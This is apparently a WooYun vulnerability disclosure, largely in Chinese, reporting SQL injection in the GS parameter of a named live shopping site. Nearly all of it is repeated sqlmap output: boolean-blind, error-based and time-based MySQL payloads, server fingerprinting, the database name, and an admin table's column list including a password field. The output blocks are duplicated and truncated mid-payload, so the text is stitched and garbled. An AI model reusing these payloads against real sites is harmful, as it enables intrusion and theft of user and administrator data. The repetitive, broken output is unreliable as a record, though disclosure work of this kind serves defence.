2016-04-14: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-05-29: 厂商已经主动忽略漏洞,细节向公众公开
测试地址:http://www.koyimall.com/?act=shop.goods_view&GS=219967测试参数:GS
lace: GETParameter: GS Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: act=shop.goods_view&GS=219768 RLIKE (SELECT (CASE WHEN (9668=9668) THEN 219768 ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: act=shop.goods_view&GS=219768 AND (SELECT 8273 FROM(SELECT COUNT(*),CONCAT(0x7178646671,(SELECT (CASE WHEN (8273=8273) THEN 1 ELSE 0 END)),0x71636c7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: act=shop.goods_view&GS=219768 AND SLEEP(5)---web application technology: Nginx, PHP 5.2.5back-end DBMS: MySQL 5.0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: GS Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: act=shop.goods_view&GS=219768 RLIKE (SELECT (CASE WHEN (9668=9668) THEN 219768 ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: act=shop.goods_view&GS=219768 AND (SELECT 8273 FROM(SELECT COUNT(*),Csqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: GS Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: act=shop.goods_view&GS=219768 RLIKE (SELECT (CASE WHEN (9668=9668) THEN 219768 ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: act=shop.goods_view&GS=219768 AND (SELECT 8273 FROM(SELECT COUNT(*),CONCAT(0x7178646671,(SELECT (CASE WHEN (8273=8273) THEN 1 ELSE 0 END)),0x71636c7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: act=shop.goods_view&GS=219768 AND SLEEP(5)---web application technology: Nginx, PHP 5.2.5back-end DBMS: MySQL 5.0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: GS Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: act=shop.goods_view&GS=219768 RLIKE (SELECT (CASE WHEN (9668=9668) THEN 219768 ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: act=shop.goods_view&GS=219768 AND (SELECT 8273 FROM(SELECT COUNT(*),CONCAT(0x7178646671,(SELECT (CASE WHEN (8273=8273) THEN 1 ELSE 0 END)),0x71636c7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: act=shop.goods_view&GS=219768 AND SLEEP(5)---web application technology: Nginx, PHP 5.2.5back-end DBMS: MySQL 5.0current user is DBA: Falsesqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: GS Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: act=shop.goods_view&GS=219768 RLIKE (SELECT (CASE WHEN (9668=9668) THEN 219768 ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: act=shop.goods_view&GS=219768 AND (SELECT 8273 FROM(SELECT COUNT(*),CONCAT(0x7178646671,(SELECT (CASE WHEN (8273=8273) THEN 1 ELSE 0 END)),0x71636c7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: act=shop.goods_view&GS=219768 AND SLEEP(5)---web application technology: Nginx, PHP 5.2.5back-end DBMS: MySQL 5.0Database: koyimallTable: durian_buy[851 entries]
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: GS Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: act=shop.goods_view&GS=219768 RLIKE (SELECT (CASE WHEN (9668=9668) THEN 219768 ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: act=shop.goods_view&GS=219768 AND (SELECT 8273 FROM(SELECT COUNT(*),CONCAT(0x7178646671,(SELECT (CASE WHEN (8273=8273) THEN 1 ELSE 0 END)),0x71636c7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: act=shop.goods_view&GS=219768 AND SLEEP(5)---web application technology: Nginx, PHP 5.2.5back-end DBMS: MySQL 5.0Database: koyimallTable: durian_admin[14 columns]+-----------------------+--------------+| Column | Type |+-----------------------+--------------+| admin_email | varchar(70) || admin_id | varchar(20) || admin_is_priv_officer | tinyint(4) || admin_level | int(11) || admin_memo | varchar(200) || admin_mobile | varchar(20) || admin_mod_date | datetime || admin_name | varchar(30) || admin_nick | varchar(100) || admin_passwd | varchar(40) || admin_reg_date | datetime || admin_status | tinyint(4) || admin_tel | varchar(20) || com_seq | int(11) |+-----------------------+--------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
你懂得
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)
